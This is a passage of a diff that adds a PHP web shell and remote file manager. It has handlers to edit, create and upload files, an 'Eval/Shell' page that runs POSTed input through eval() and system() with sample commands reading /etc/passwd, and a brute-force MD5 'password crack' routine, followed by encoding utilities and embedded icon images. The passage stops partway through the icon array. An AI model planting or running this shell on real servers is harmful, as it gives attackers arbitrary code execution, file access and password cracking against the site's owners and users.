+   else fclose($fi);
+   if ($msg=="") $msg="(<font color=#009900><b>".mm("full read/write access")."</b></font>)";
+   echo "<p><b>".mm("EDIT FILE")."</b> $msg<p>";
+
+   if (!$fi=@fopen($d.$f,"rb")) exit("".mm("can't open, access denied")."");
+   echo "<form action=$self method=post>
+   <input type=hidden name=c value=e_submit>
+   <input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+   <input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+   <textarea name=text cols=70 rows=20 style='width: 100%;'>".
+   htmlspecialchars(fread($fi,filesize($d.$f)))."</textarea><p>
+   <input type=submit value=' ".mm("SAVE FILE (write to disk)")." '>
+   <input type=checkbox name=confirm value=1 id=conf> 
+   <label for=conf><font color=red><b><= confirm</b></font></label>
+   </form>";
+
+   break;
+
+
+case "e_submit":
+
+   if (!$write_access) exitw();
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("file not found");
+   if (!isset($text)) exit("err# e_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($d.$f,"w+")) exit("access denied");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+   echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">SAVE DONE (go back)!</a>";
+
+   break;
+
+
+
+case "newfile_submit":
+
+   if (!$write_access) exitw();
+
+   if (!isset($text) || !isset($df)) exit("err# newfile_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($df,"w+")) exit("access denied, can't create/open [$df]");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+   break;
+
+
+case "fileupload_submit":
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newfile_submit 1");
+   if (!isset($df3)) exit("err# newfile_submit 2");
+
+   $fname="";
+   if (isset($df2)) { 
+      if (!preg_match("~([^/]+)$~",$HTTP_POST_FILES['userfile']['name'],$ok)) {
+         exit("Upload failed: can't detect file name");
+      }
+      $fname=$ok[1];
+   }
+   else {
+      $fname=$df3;
+   }
+   if ($fname=="") 
+     exit("".mm("You mast checked 'create file name automatic' OR typed file name!").""); 
+   if (isset($df4)) $fname=strtolower($fname);
+
+   echo "Temp file: ".$HTTP_POST_FILES['userfile']['tmp_name']."<br>";
+   echo "Origin file name: ".$HTTP_POST_FILES['userfile']['name']."<br>";
+   echo "File size: ".$HTTP_POST_FILES['userfile']['size']."<br>";
+   if ($df[strlen($df)-1]!="/") $df.="/";
+   echo "".mm("SAVING TO").": <font color=blue>$df</font><font color=red><b>$fname</b></font><p>";
+
+   ob();
+   $ok=copy($HTTP_POST_FILES['userfile']['tmp_name'],"$df$fname");
+   obb();
+   if (!$ok) exit("<font color=red><b>".mm("Sorry, access denied")."</b></font> $obb");
+
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>NEW FILE SAVED</a>";
+  
+   break;
+
+
+case "newdir_submit": 
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newdir_submit 1");
+   ob();
+   if (!mkdir($df,$mkdir_mode)) {
+      obb();
+      exit("Access denied $obb");
+   }
+   obb();
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>Go to new directory!</a>";
+
+   break;
+
+
+case "t": 
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+
+   if (!$write_access) exitw();
+   error_reporting(2038);
+
+   if (!isset($php)) {
+      $php="/* line 1 */\n\n// ".mm("for example, uncomment next line").":\nphpinfo();\n\n//readfile(\"/etc/passwd\");\n\n/* line 8 */";
+      $skipphp=1;
+      $pre='checked';
+      $nlbr='';
+      $xmp='';
+      $htmls='checked';
+   } 
+
+   echo "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"&lt;?\" ".mm("and")." \"?&gt;\")
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=php rows=".(!isset($skipphp)?10:4)." cols=60 style='width:100%;'>$php</textarea>
+<input type=checkbox name=pre value='checked' $pre id='pre'>
+   <label for='pre'> add &lt;pre&gt;</label> &nbsp;
+<input type=checkbox name=xmp value='checked' $xmp id='xmp'>
+   <label for='xmp'> add &lt;xmp&gt;</label> &nbsp;
+<input type=checkbox name=htmls value='checked' $htmls id='htmls'>
+   <label for='htmls'> add htmlspecialchars()</label> &nbsp;
+<input type=checkbox name=nlbr value='checked' $nlbr id='nlbr'>
+   <label for='nlbr'> add nl2br()</label><br>
+<input type=submit></form>
+<P>";
+
+   if (!isset($shell)) $skipshell=1;
+
+   if (!isset($skipphp)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      if ($pre<>'') echo "<pre>";
+      if ($xmp<>'') echo "<xmp>";
+      if ($nlbr<>'' || $htmls<>'') {
+         ob_start();
+      }
+      if ($phpeval_access) eval($php);
+      else die("Sorry, function eval() disabled.");
+      if ($nlbr<>'' || $htmls<>'') {
+         $tmp=ob_get_contents();
+         ob_end_clean(); 
+         if ($htmls<>'') $tmp=htmlspecialchars($tmp);
+         if ($nlbr<>'') $tmp=nl2br($tmp);
+         echo $tmp;
+      }
+      if ($xmp<>'') echo "</xmp>";
+      if ($pre<>'') echo "</pre>";
+      echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      echo "</table></table></table></table></table></table></table></table></table></center></table><hr size=1 noshade>";
+   }
+
+   if (!isset($shell)) {
+      $shell="#".mm("example (remove comments '#')").": \n\n#cat /etc/passwd;\n\n#ps -ax\n\n#uname -a";
+      $skipshell=1;
+   }
+   echo "<P><b>".mm("Shell commands")."</b>
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=shell rows=".(!isset($skipshell)?10:4)." cols=60 style='width:100%;'>$shell</textarea><br>
+<input type=submit></form>
+<P>";
+   if (!isset($skipshell)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
+      if ($system_access) system($shell);
+      else die("Sorry, function system() disabled.");
+      echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
+      </table></table></table></table></table></table></table></table></table></center><hr size=1 noshade>";
+   }
+
+
+  $ttype=array(1=>"MD5",7=>"Decode MD5 (password crack)<br>",
+  2=>"Base64",3=>"Base64 + chunk",4=>"Base64 + chunk + quotes",
+  5=>"Decode Base64<br>",
+  6=>"UnixTime=>Date(".time().")",
+  8=>"MKtime: YYYY MM DD [hh [mm [ss]]]<br>",
+  9=>"Translit=&gt;RusText", 14=>"RusText=&gt;Translit<br>",
+  10=>"cp1251=&gt;koi8r",11=>"koi8r=&gt;cp1251",12=>"cp1251=&gt;mac",13=>"mac=&gt;cp1251",
+  15=>"koi8r=&gt;mac",16=>"mac=&gt;koi8r",
+  );
+  echo "<P><b>".mm("Universal convert")."</b>";
+
+  echo "<a name=convert></a><form action='$self#convert' method=post>";
+  foreach ($ttype as $k=>$v) 
+     echo "&nbsp;&nbsp;<nobr><input ".($k==$name?"checked":"")." type=radio name=name value=$k id=x$k><label for=x$k>$v</label></nobr> ";
+
+  echo "
+<input type=hidden name=c value=t>
+<textarea name=convert rows=".(isset($convert)?10:3)." cols=60 style='width:100%;'>".htmlspecialchars($convert)."</textarea><br>
+<input type=submit><br>";
+
+   
+   $russtr1="JCUKENGZH_FYVAPROLDESMIT_Bjcukengzh_fyvaproldesmit_b";
+   $russtr2="ÉÖÓÊÅÍÃÇÕÚÔÛÂÀÏĞÎËÄİÑÌÈÒÜÁéöóêåíãçõúôûâàïğîëäıñìèòüá";
+   function from_translit($ss) {
+      global $russtr1,$russtr2;
+      $w=array("Sch",'Ù',"SCH",'Ù',"ScH",'Ù',"SCh",'Ù',"sch",'ù',"Jo",'¨',"JO",'¨',"jo",'¸',
+      "Zh",'Æ',"ZH",'Æ',"zh",'æ',"Ch",'×',"CH",'×',"ch",'÷',"Sh",'Ø',"SH",'Ø',"sh",'ø',
+      "##",'Ú',"''",'Ü',"Eh",'İ',"EH",'İ',"eh",'ı',"Ju",'Ş',"JU",'Ş',"ju",'ş',"Yu",'Ş',
+      "YU",'Ş',"yu",'ş',"YA","ß","Ya","ß","ya","ÿ","Ja",'ß',"JA",'ß',"ja",'ÿ');
+      $c=count($w);
+      for ($i=0; $i<$c; $i+=2) $ss=str_replace($w[$i],$w[$i+1],$ss);
+      $ss=strtr($ss,$russtr1,$russtr2);
+      $ss=preg_replace("!([à-ÿ]+)~([à-ÿ]+)!is","\\1\\2",$ss);
+      return $ss;
+   }
+   function to_translit($ss) {
+      global $russtr1,$russtr2;
+      $ss=strtr($ss,$russtr2,$russtr1);
+      $ss=str_replace(
+         array('Ø', 'Ù',  'Æ', 'ß', '×', 'Ş', '¨', 'ø', 'ù',  'æ', 'ÿ', '÷', 'ş', '¸', ),
+         array('SH','SCH','ZH','YA','CH','YU','YO','sh','sch','zh','ya','ch','yu','yo',),
+         $ss);
+      return $ss;
+   }
+   
+   if (isset($convert)) {
+      if (!isset($name)) $name="0";
+      $out="";
+      switch ($name) {
+
+         case 1: 
+            $out=md5($convert);
+            break;
+
+         case 2:
+            $out=base64_encode($convert);
+            break;
+
+         case 3:
+            $out=chunk_split(base64_encode($convert));
+            break;
+
+         case 4:
+            $out=base64_encode($convert);
+            $out=substr(preg_replace("!.{1,76}!","'\\0'.\n",$out),0,-2);
+            break;
+
+         case 5:
+            $out=base64_decode($convert);
+            break;
+
+         case 6:
+            $convert=intval($convert);
+            if ($convert==0) $convert=time();
+            $out="Unixtime=$convert\n---Day/Month/Year--\n".
+               date("d/m/Y H:i:s",$convert)."\n".
+               date("d-m-Y H:i:s",$convert)."\n".
+               date("d.m.Y H:i:s",$convert)."\n".
+             "---Month/Day/Year--\n".
+               date("m/d/Y H:i:s",$convert)."\n".
+               date("m-d-Y H:i:s",$convert)."\n".
+               date("m.d.Y H:i:s",$convert)."\n".
+             "---------SQL-------\n".
+               date("Y-m-d H:i:s",$convert)."\n".
+               date("Y m d H i s",$convert)."\n".
+               date("YmdHis",$convert);
+            break;
+
+         case 8:
+            $c=explode(" ",trim(preg_replace("! +!"," ",$convert)));
+            if (count($c)<3 || count($c)>6) $out="Bad value. Type: 2000 12 31 or 2000 12 31 12 59 59";
+            else {
+               if (empty($c[0])) $c[0]=1970;
+               if ($c[0]<50) $c[0]=2000+$c[0];
+               if ($c[0]>50 && $c[0]<100) $c[0]=1900+$c[0];
+               if (empty($c[1])) $c[1]=1;
+               if (empty($c[2])) $c[2]=1;
+               if (empty($c[3])) $c[3]=0;
+               if (empty($c[4])) $c[4]=0;
+               if (empty($c[5])) $c[5]=0;
+               $out="TIME: $c[0]-$c[1]-$c[2] $c[3]:$c[4]:$c[5]\nMKTIME: ".mktime($c[3],$c[4],$c[5],$c[1],$c[2],$c[0]);
+            }
+            break;
+
+         case 9:
+            $out=from_translit($convert);
+            break;
+
+         case 14:
+            $out=to_translit($convert);
+            break;
+
+         case 10: $out=convert_cyr_string($convert,'w','k'); break;
+         case 11: $out=convert_cyr_string($convert,'k','w'); break;
+         case 12: $out=convert_cyr_string($convert,'w','m'); break;
+         case 13: $out=convert_cyr_string($convert,'m','w'); break;
+         case 15: $out=convert_cyr_string($convert,'k','m'); break;
+         case 16: $out=convert_cyr_string($convert,'m','k'); break;
+
+         case 7:
+            echo "<script>top.location.href='$self?c=md5crack&text=$convert'</script>";
+            break;
+
+         case 0:
+            $out="Please select anythink function in list. Example: type 'test' and select 'md5'. Then click 'Submit'.";
+            break;
+
+         default: 
+            $out='Sorry, this function not work (try new versions)';
+      }
+      echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<pre><xmp>$out</xmp></pre>\n\n\n\n\n\n\n\n\n<hr size=1 noshade>";
+   }
+   
+   break;
+
+
+case "md5crack":
+
+   echo "<form action=$self name=main><input type=hidden name=c value=md5crack>
+   <h2>Decode MD5 (<a href=$self>home</a>|<a href=$self?c=t&name=1#convert>md5</a>)</h2><P>";
+
+   if (!isset($go)) {
+      if (!isset($fullqty)) $fullqty="";
+      if (!isset($fulltime)) $fulltime="";
+      if (!isset($php)) $php="";
+      if (!isset($from)) $from="";
+      echo "<b>STRING</b>: <input type=text name=text value='$text' size=40> (only 32 char: 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f)";
+      echo "<P><b>Range</b>: <input type=text name=php value=\"".htmlspecialchars($php)."\" size=90><br>";
+      $chars=array(
+      'a-z'=>"abcdefghijklmnopqrstuvwxyz",
+      'a-z,A-Z'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
+      'a-z,0-9'=>"abcdefghijklmnopqrstuvwxyz0123456789",
+      'a-z,A-Z,0-9'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
+      'a-z,A-Z,0-9,other'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~`!@#\$%^&*()_+-=[]{};:,<.>/\"'\\");
+      $i=0;
+      foreach ($chars as $k=>$v) {
+         echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\",$v))."\"</script>
+         <a href='' onclick=\"document.main.php.value=str$i;return false\">$k</a> &nbsp; ";
+         $i++;
+      }
+      echo "<P>
+      <b>Start from</b>: <input type=text size=70 name=from value='$from'><P>
+      <input type=hidden name=go value=1>
+      <input type=hidden name=fullqty value=$fullqty>
+      <input type=hidden name=fulltime value=$fulltime>
+      <input type=submit value='Start!'><form>";
+   }
+   else {
+
+      function mdgetword() {
+         global $php,$from,$word;
+         $word="";
+         for ($i=0; $i<count($from); $i++) $word.=$php[$from[$i]];
+      }
+
+      $fulltime=@intval($fulltime);
+      $fullqty=@intval($fullqty);
+
+      $text=strtolower($text);
+      if (!preg_match("!^[0-9a-f]{32}$!",$text)) exit("md5 bad format: must be 32 bytes, range 0-9,a,b,c,d,e,f");
+      if (!isset($php) || strlen($php)==0) $php="qwertyuiopasdfghjklzxcvbnm";
+      if (!isset($from) || !preg_match("!^([0-9]+):(([0-9]+,)*[0-9]+)$!",$from,$ok)) {
+         $pos=0;
+         $from=0;
+      }
+      else {
+         $pos=$ok[1];
+         $from=$ok[2];
+      }
+      $from=explode(",",$from);
+      if (!is_array($from) || !count($from) || count($from)==1 && $from[0]==0) { 
+         $from=array(0);
+         if (md5("")===$text) exit("** DONE **<br><br>md5('')=$text<br><br>(try empty string, 0 bytes!)");
+      }
+      $phplen=strlen($php);
+      mdgetword();
+      $poslen=strlen($word);
+      if ($pos<0 || $pos>=$poslen) $pos=0;
+
+      for ($i=0; $i<10; $i++) { echo "<!-- -->\r\n"; flush(); }
+
+      echo "<h3><a href='$self?c=md5crack".
+         "&from=".urlencode("$pos:".implode(",",$from)).
+         "&text=".urlencode($text).
+         "&php=".urlencode($php).
+         "&fulltime=$fulltime&fullqty=$fullqty".
+         "'>Save this link</a> - click for break and save current position</h3>";
+      flush();
+
+      echo "
+      MD5_HASH=$text<br>
+      CURRENT_WORD=$word<br>
+      CURRENT_DIGIT=$pos:".implode(",",$from)."<br>
+      RANGE=".htmlspecialchars($php)."<br>
+      ProcessTime=$fulltime sec (".(floor($fulltime/60/60))."h)<br>
+      Calculation(qty)={$fullqty}0000<p><font face=courier>";
+      flush();
+
+
+      $fullsum=pow($phplen,$poslen);
+      $time1=time();
+      $i=0;
+
+      while (1) {
+
+         $i++;
+         if ($i>50000) {
+            $time=time()-$time1;
+            if ($time>20) break;
+            $i=0;
+            $sum=0;
+            for ($j=1; $j<count($from); $j++) $sum+=$from[$j]*pow($phplen,$j);
+            printf("<nobr><b>%02.2f%%</b> ($word) %02dsec |</nobr> \r\n",
+               $sum*100/$fullsum,$time);
+            flush();
+            $fullqty+=5;
+         }
+
+         if (md5($word)===$text) 
+            exit("<P><font color=red size=+1><b>** DONE **<P><tt>[$word]=[$text]</tt></b></font>
+            <script> window.focus();  window.focus(); setTimeout(\"alert('Done!')\",100);</script>");
+         $from[$pos]++;
+         if ($from[$pos]==$phplen) {
+            $flag=1;
+            $from[$pos]=0;
+            $word[$pos]=$php[0];
+            for ($pos=$pos+1; $pos<$poslen; $pos++) {
+               if ($from[$pos]+1<$phplen) {
+                  $from[$pos]++;
+                  $word[$pos]=$php[$from[$pos]];
+                  $flag=0;
+                  $pos=0;
+                  break;
+               }
+               else {
+                  $from[$pos]=0;
+                  $word[$pos]=$php[0];
+               }
+            }
+            if ($flag) {
+               $from[]=0;
+               $poslen=count($from);
+               $word.=$php[0];
+               $pos=0;
+               $fullsum=pow($phplen,$poslen);
+            }
+         }
+         $word[$pos]=$php[$from[$pos]];
+      }
+
+      $fulltime+=time()-$time1;
+      if ($i>5000) $fullqty++;
+      $url="$self?c=md5crack".
+           "&from=".urlencode("$pos:".implode(",",$from)).
+           "&text=".urlencode($text).
+           "&php=".urlencode($php).
+           "&fulltime=$fulltime&fullqty=$fullqty&go=1";
+      echo "<script>location.href=\"$url\"</script><a href='$url'>click here</a>";
+
+   }
+
+   break;
+
+
+case "phpinfo":
+
+   phpinfo();
+   break;
+
+
+case "codes":
+
+   error_reporting(2039);
+   if (!isset($limit)) $limit=999;
+   if (!isset($fontsize)) $fontsize="300%";
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+   echo "<h3>".mm("Character map (symbol codes table)")."</h3>
+   <form action=$self method=get>
+   <input type=hidden name=c value=\"codes\">
+   <select name=fontname size=1>
+   <option value='Webdings'>====[ ".mm("Select font")." ]====";
+
+   foreach (array('Arial','Courier','Comic Sans MS','Fixedsys','Small fonts','Symbol',
+      'System','Tahoma','Terminal','Times New Roman','Verdana',
+      'Webdings','Wingdings','Wingdings 2','Wingdings 3') as $v)
+      echo "<option".($fontname==$v?" selected":"").">$v";
+   
+   echo "</select>
+   ".mm("or type other")." 
+   <input size=13 type=text name=fontname2 value=\"$fontname2\">.
+   ".mm("Font size").": <input size=6 type=text name=fontsize value=\"$fontsize\">.<br>
+   ".mm("Code limit").": 
+   <input type=radio name=limit value=255 id=a1 ".($limit==255?"checked":"")."><label for=a1>0-255</label>
+   <input type=radio name=limit value=999 id=a2 ".($limit==999?"checked":"")."><label for=a2>0-999 </label>
+   <input type=radio name=limit value=9999 id=a3 ".($limit==9999?"checked":"")."><label for=a3>0-9999</label>
+   <input type=submit value='".mm("Generate table")." !'></form><P>";
+
+   if (!isset($fontname)) break; 
+   if (!empty($fontname2)) $fontname=$fontname2;
+   echo "
+   <STYLE>
+   .codes { font: $fontsize $fontname; text-align: center; }
+   .z { font: 12pt Fixedsys; color: #cccccc; }
+   </STYLE>
+   <table class=codes border=0 cellspacing=0 cellpadding=1>";
+   ?>
+   <SCRIPT>
+   m=8;
+   n=1;
+   s=new String("");
+   s=s+"<tr><td class=z>&amp;#0000;</td><td>&nbsp;</td>";
+   for (i=1; i<=<?php echo $limit; ?>; i++) {
+      if (i<10) x="000"+i;
+      else if (i<100) x="00"+i;
+           else if (i<1000) x="0"+i;
+                else x=i;
+      if (n%m==0) s=s+"<tr>";
+      s=s+"<td class=z>&amp;#"+x+";</td>";
+      s=s+"<td>&#"+x+";</td>";
+      if (n%m+1==m) s=s+"</tr>";
+      if (s.length>500) {
+         document.write(s);
+         s=""
+      } 
+      n++;
+   }
+   document.write(s);
+   </SCRIPT>
+   <?php
+
+   echo "</table>";
+   break;
+
+
+
+case "img":
+
+   unset($img);
+$img=array(
+'dir'=>
+'R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'.
+'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=',
+'fon'=>
+'R0lGODlhQAYEALMAAAAAAP///6bK8A4obRs2eSlFhDZTkEVjnVRyqWKCtnCQwXyezIiq1pO24J3A'.
+'6P///yH5BAEAAA8ALAAAAABABgQAAAT/cMhJq704E7n78EQXjmRpnmcRqizRsgUcz3Rt37QR63zR'.
+'GzygcEgsGo8HYNKQbDKfh2Z0Sq1ar9goQsvdeg/eMGJMLpvPaHRivG4j3O14Yk6v2+/4u2K+7yf8'.
+'Cn2Bg4SFhoeGC4GKjAqNC4yQkpOUlZaTDJCZmwubngygoaKjpKUNDKepqKipDa6vsLGysg4Ntbe2'.
+'tg63u72+v8AOArvDxcLFAsnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx'.
+'8vPSGfb3GCAfHBP6IvwgRKBIscJFwREvXMRYkVCGQhw1dPiYSJHiDx8SLwLBeKSjkyUg/5VAGRnl'.
+'CUkmWVKCWfmF5UqXX8bAZJmmJpubbt6QWaNzTs+ccOTkwbPnj9GjfIwCKspUqSBEiRxJnbpI6qNG'.
+'Vh1d2sopUydNYEF18tp1bClTq06JUqvK1aq0rGbNwvUKl11deIP9Mkasr7Fkwo4do0e4sOHDiBMr'.
+'Xsy4sePHkCNLnkzZHL7LmC9s2LdZ34eAAkOjUGGCNAyEBhkqfDiDNcTXGS1O7IFx9sYhHDuKRCIy'.
+'pBSSUqgAV7kFS/GXMcHIXK6cDEybOm+e4emzp/Wgdd7E0T50aNNAdADxeTroT3moVQspWrT+0dRI'.
+'k7Ju/VrJK/2ynsyG+nr2LSlVrMCVlsIsA8pVCyx05bJLXrzoFQxff0WITGUUVmjhhRhmqOGGHHbo'.
+'4YcgepPZiP3wA9A+nJ0o0GchsDjQiwaRFiNCL7R2Wo2vRZRDRbJpdJsQueWm2xImfdTbbkYKNwUU'.
+'KjXp0pPMJScGTdBVeZ10V2J3XXdEJaWUHUWZ9yV4ZDqFHnrrZVWVe5VYNZ8l9pF1H3/87ddVf6Oo'.
+'JSCAcMHSp1wGKujKXQsGo8uDvgwTWGCKKjMYYCFGKumklFZq6aWYZqrppstEAAA7',
+'mode'=>
+'R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO'.
+'2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/'.
+'dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=',
+
+'refresh'=>
+'R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA'.
+'AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY'.
+'3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ'.
+'R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=',
+'search'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//'.
+'/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap'.
+'s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD'.
+'AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr'.
+'Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==',
+'setup'=>
+'R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC'.
+'QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA'.
+'ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB'.
+'qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE'.
+'OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==',
+'up'=>
+'R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg'.
+'+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV'.
+'IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==',
+'sort_asc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa'.
+'SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==',
+'sort_desc'=>
+'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb'.
+'SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=',
+'exe'=>
+'R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7'.
+'WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt'.
+'xhIAOw==',
+'html'=>
+'R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz'.
+'c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P'.
+'KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk'.
+'Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR'.
+'ADs=',
+'txt'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ'.
+'SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7'.
+'UpPWG3Ig6Hq/XmRjuZwkAAA7',
+'unk'=>
+'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANE'.
+'SLPcSzCqQKsVQ8JhexBBJnGVYFZACowleJZrRH7lFW8eDbMXaPO1juA2uXiGwBwFKRMeiTPlByrd'.
+'yUzYbJao6npVkQQAOw==',
+'php'=>
+'R0lGODlhEwAQALMAAAAAAP///9fX3d3f7s/S5F1qpmJpjKOqyr7D27i80K+ywEtam4OIk+T/AO7u'.
+'7v///yH5BAEAAA8ALAAAAAATABAAAAR08D0wK71VSna47yBHadxhnujRqKRJvC+SJIPKbgJR7DzP'.
+'NECNgNFbGI/HhmZQWASezugzsFBKdtJsoEA1aLBTJzTMIDWpRqr6mFgyounswiAgDYjY/FwxGD1K'.
+'BAMIg4MJCg41fiUpjAeKjY1+EwCUlZaVGhEAOw==',
+'img'=>
+'R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV'.
+'Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp'.
+'qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq'.
+'BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==',
+'edit'=>
+'R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze'.
+'EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61'.
+'LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==',
+'papki'=>
